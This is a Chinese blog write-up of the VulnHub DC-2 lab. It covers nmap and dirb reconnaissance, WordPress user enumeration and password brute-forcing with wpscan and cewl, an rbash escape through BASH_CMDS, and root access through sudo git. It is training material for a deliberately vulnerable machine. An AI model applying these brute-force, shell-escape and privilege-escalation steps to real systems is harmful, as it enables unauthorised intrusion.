Dc-2通关教程

于 2024-09-29 17:17:30 发布
阅读量618 收藏 10
点赞数 12
文章标签: 网络攻击模型 web安全 系统安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_84645634/article/details/142637487
版权

dc-2通关解析

一.与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始。

和DC-1一样,有五个flag

  1. 环境下载

https://www.vulnhub.com/entry/dc-2,311/

  1. 环境安装

进入虚拟,点击打开虚拟机找到如下图文件导入即可(如果报错点击重试即可)完成之后点击虚拟机设置,将默认的乔连改为NAT。

  • 渗透靶场
  1. 先查自己kali本机的ip地址

Ifonfig

  1. 信息收集,找到靶机dc-2的真实ip

nmap -sP 192.168.45.0/24

探查端口及服务

nmap -A -p- -v 192.168.45.133(靶机ip)

发现开放了80端口,存在web服务,Apache/2.4.10,

发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1

  1. 访问web

192.168.45.133

发现不能访问成功,并且我们的ip直接转换成了域名,我们只需要修改一下hosts文件,增加一个ip域名指向即可

vim /etc/hosts

点击i输入靶机IP加靶机名

192.168.45.133 dc-2

输入完成后点击esc,shift加;wq回车即可

完成后再次访问或刷新一下便成功了

很明显便可以发现一个wordpress的站点,点击它

发现是flag1
大致意思如下:
你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录。

意思就是暴力破解,账号密码

  1. 先进行目录扫描

dirb http://dc-2/

发现可疑后台地址,右键打开链接

打开后到了该页面

点击其它地址也没什么有用的东西

5.用户名枚举

前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

扫描wordpress版本

wpscan --url http://dc-2

得到版本为4.7.10

登录页面尝试登录
随机输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举

先枚举用户

wpscan --url http://dc-2 --enumerate u

得到了三个用户

admin

jerry

tom

6.暴力破解出账号密码

根据flag1可以用暴力破解,我们使用cewl生成字典,

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

cewl http://dc-2/ -w dc2.txt

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dc2.txt

得到了两个账号密码

jerry/adipiscing

tom/parturient

分别使用这两个账号密码登录站点

发现都可以成功登录

登录之后,我们看到flag2(jerry的账号)

点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh

  1. 进入ton家目录

Tom

Parturient

输入ssh tom@192.168.45.133 -p 7744

得到flag3

发现cat等多个产看命令不可用,可用less和vi

内容

  1. 尝试rbash绕过

查看可以使用命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

  1. 进入jerry的家目录

先输入

Cd ..

ls

后输入

Cd jerry

Ls

得到flag4

输入cat flag4.txt查看提示信息

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

使用tom用户无权限运行sudo 我们切换到jerry用户

我们可以看到无需root权限,jerry 可以使用 git

sudo -l  

  1. 提权

find / -user root -perm -4000 -print 2>/dev/null

jerry用户不可以直接sudo su

使用git命令进行提取

输入!/bin/sh,直接输shift加!往后输就行了

提权成功

输入whoami

  1. 发现final-flag.txt

cd /root

cat final-flag.txt

结束了,恭喜。

鸡蚝大补
关注
DC-2通关教程
2401_83876878的博客
09-26 991
DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。5. 发现不能访问,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt。wpscan --url http://dc-2 --enumerate u 枚举用户。登录后台之后,我们看到flag2,我用的是jerry的账号。
DC-4通关教程
m0_74402888的博客
04-24 2068
6默认的shell:这个字段指定了用户的默认shell,即用户登录后用来执行命令的程序。在Linux系统中,/etc/passwd是一个重要的系统用户配置文件,用于存储系统中所有用户的基本信息。在Linux中,/usr/bin目录主要用于存放用户可执行的二进制文件,即用户可以直接执行的程序。火狐浏览器打开网页,用自带的扩展“wappalyzer”查看页面的一些信息,cms,js版本,和php信息,发现没有可用的信息,5家目录:这个字段指定了用户的家目录,即用户登录后所处的目录。用户可以属于多个组。
DC-5通关教程
m0_74402888的博客
04-25 1054
具体来说,这个命令在文件系统的根目录(/)开始,查找所有设置了setuid位(set user ID on execution)的文件,并将这些文件的路径打印出来。可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞。编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容。刷新后页面内容会发生变化,可能存在文件包涵,这个是一个突破口。
靶机-DC-2通关全过程
认真走好每一小步
06-18 490
其中,"^USER^"和"^PASS^"将在攻击过程中分别被替换为不同的用户名和密码,"wp-submit=LogIn"表示登录按钮的名称,"testcookie=1"表示要求服务器设置一个测试Cookie,而"S=location"表示如果攻击成功,就重定向到/target/路径下的网页。当一个用户使用rbash作为其默认shell时,该用户将被限制只能执行一些基本的命令,例如cd、ls和echo等,并且不能使用绝大多数的shell功能,如变量赋值、重定向、管道和通配符扩展等。
DC-8通关教程
m0_74402888的博客
04-26 1154
SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险。nid=1" --level=5 --risk=3 --batch --current-db //爆破当前数据库。测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码。sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上。SUID是给命令赋予root用户的权限,权限在命令上。
DC-2靶机通关
m0_57206390的博客
08-19 134
DC-2靶机通关,详解
DC-3通关教程
m0_74402888的博客
04-23 824
利用John(john 设置为使用特定的哈希格式进行破解,有多种方法可以做到对哈希类型进行识别)工具,对该密码进行爆破拆解。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。joomscan是一款开源的且针对joomla的扫描器,kali可以用命令。searchsploit是一款kali自带的搜索漏洞信息的模块。
DC-6通关教程
m0_74402888的博客
04-25 916
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
DC-1通关教程
2401_83876878的博客
09-20 811
我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7。扫描网段中有哪些主机在线,使用 -sP 参数,不扫描端口,只扫描「存活主机」。进入home目录,发现flag4.txt文件,提示需要提升权限。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3040
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
WEB-CTF通关教程
m0_50098640的博客
08-01 584
信息泄露的第二关 进去页面如下 查看源代码发现后缀为.sql的文件。 看见这个文件思路就是把这个文件下载下来查看敏感数据。尝试在链接后直接加文件名,发现直接下载了我们的文件。 使用记事本打开文件,得到flag值。 暴力破解第二关 打开页面提示如下, 点击地址传送门得到如下链接 将链接的UID使用在线base64解码得到的结果如下 看到这明白了解这个题的思路,抓包爆破UID值。从T_1到T_5000,思路有了,可是具体爆破的时候不知道怎么爆破,等知道怎么解决这个问题了之后再来更。 xss第二关
【xss-labs靶场实战通关教程
AuroraMiraitowa的博客
03-09 1125
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
【智能交互】OPPO接入小布语音技能通关教程:个人开发者实现接口调用
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
07-19 3132
适用人群:本教程适合大赛接入小布语音技能的同学以及初次使用小布助手的开发者本篇文章是博主弄了多次测试才勉强弄明白的,OPPO的开发文档和没有没啥区别很多人会问:“为啥有更成熟的其他语音技能平台放着不用?答:“因为我在参加的比赛是由oppo主办方举办的,若要想进决赛,必须要接入OPPO开放平台”猜想测试部分和实际操作部分,请根据你的需要进行跳过选择。
OVerTheWire:NATAS通关0-20
friutUncil的博客
09-30 1099
LV0 natas将是一些服务端的安全基础知识,ok,试一下吧 You can find the password for the next level on this page. 打开就是这句话,在此页能找到密码,但是找不到呀,那就看下源码吧 F12 再注释里找到密码 The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto LV...
2023护网蓝初面试题汇总
m0_74131821的博客
05-18 1900
日薪1000+的护网行动开始招人了,有想法的速看!
网络安全详解
weidl001的博客
09-21 1531
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
最新发布
2401_84434570的博客
09-26 890
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1317
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
matlab2021abuck dc-dc仿真实验教程
11-02
2. 学会使用MATLAB建立DC-DC变换器的仿真模型; 3. 学会分析和评估电路的性能,如电压波形、电流波形和功率效率等; 4. 学会设计和优化DC-DC变换器的控制策略。 总之,MATLAB 2021a版本中的ABuck DC-DC仿真实验教程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值